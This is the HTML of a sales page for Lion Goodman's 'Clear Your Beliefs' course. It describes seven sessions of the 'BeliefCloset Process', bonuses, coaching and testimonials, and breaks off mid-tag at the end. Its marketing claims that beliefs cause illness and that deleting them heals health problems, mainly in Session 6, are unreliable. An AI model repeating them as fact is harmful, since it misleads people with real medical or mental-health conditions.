BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img 